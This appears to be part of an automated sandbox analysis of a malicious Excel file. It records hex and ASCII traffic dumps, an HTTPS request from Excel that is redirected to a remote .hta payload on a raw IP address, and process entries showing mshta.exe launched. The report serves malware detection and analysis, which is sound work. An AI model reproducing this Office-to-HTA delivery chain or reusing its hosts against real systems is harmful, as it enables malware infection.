                          Data Ascii: 09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%6c%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%
                          Jan 14, 2025 13:39:30.862121105 CET1236INData Raw: 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30
                          Data Ascii: 09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.44977314.103.79.104437732C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          TimestampBytes transferredDirectionData
                          2025-01-14 12:39:28 UTC247OUTGET /liT0QqiQ?&skate=yummy&sack=gigantic&epee=damaged&bookcase HTTP/1.1
                          Accept: */*
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                          Host: s.deemos.com
                          Connection: Keep-Alive
                          2025-01-14 12:39:30 UTC466INHTTP/1.1 302 Found
                          Date: Tue, 14 Jan 2025 12:39:30 GMT
                          Content-Type: text/plain; charset=utf-8
                          Content-Length: 106
                          Connection: close
                          X-DNS-Prefetch-Control: off
                          X-Frame-Options: SAMEORIGIN
                          Strict-Transport-Security: max-age=15724800; includeSubDomains
                          X-Download-Options: noopen
                          X-Content-Type-Options: nosniff
                          X-XSS-Protection: 1; mode=block
                          Location: http://131.226.2.34/xampp/meno/me/somenewgirlscameonmylifewithherattitudesonhere.hta
                          Vary: Accept
                          2025-01-14 12:39:30 UTC106INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 33 31 2e 32 32 36 2e 32 2e 33 34 2f 78 61 6d 70 70 2f 6d 65 6e 6f 2f 6d 65 2f 73 6f 6d 65 6e 65 77 67 69 72 6c 73 63 61 6d 65 6f 6e 6d 79 6c 69 66 65 77 69 74 68 68 65 72 61 74 74 69 74 75 64 65 73 6f 6e 68 65 72 65 2e 68 74 61
                          Data Ascii: Found. Redirecting to http://131.226.2.34/xampp/meno/me/somenewgirlscameonmylifewithherattitudesonhere.hta


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Click to jump to process

                          Target ID:0
                          Start time:07:38:33
                          Start date:14/01/2025
                          Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                          Imagebase:0x3a0000
                          File size:53'161'064 bytes
                          MD5 hash:4A871771235598812032C822E6F68F19
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Target ID:5
                          Start time:07:39:29
                          Start date:14/01/2025
                          Path:C:\Windows\SysWOW64\mshta.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\mshta.exe -Embedding
                          Imagebase:0x9f0000
                          File size:13'312 bytes
                          MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate
                          Has exited:false

                          Target ID:7
                          Start time:07:39:45
                          Start date:14/01/2025
                          Path:C:\Windows\splwow64.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\splwow64.exe 12288
                          Imagebase:0x7ff7fcdc0000
                          File size:163'840 bytes
                          MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Target ID:11
                          Start time:07:39:59
                          Start date:14/01/2025
                          Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\P-04071A.xls"
                          Imagebase:0x3a0000
                          File size:53'161'064 bytes
                          MD5 hash:4A871771235598812032C822E6F68F19
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          No disassembly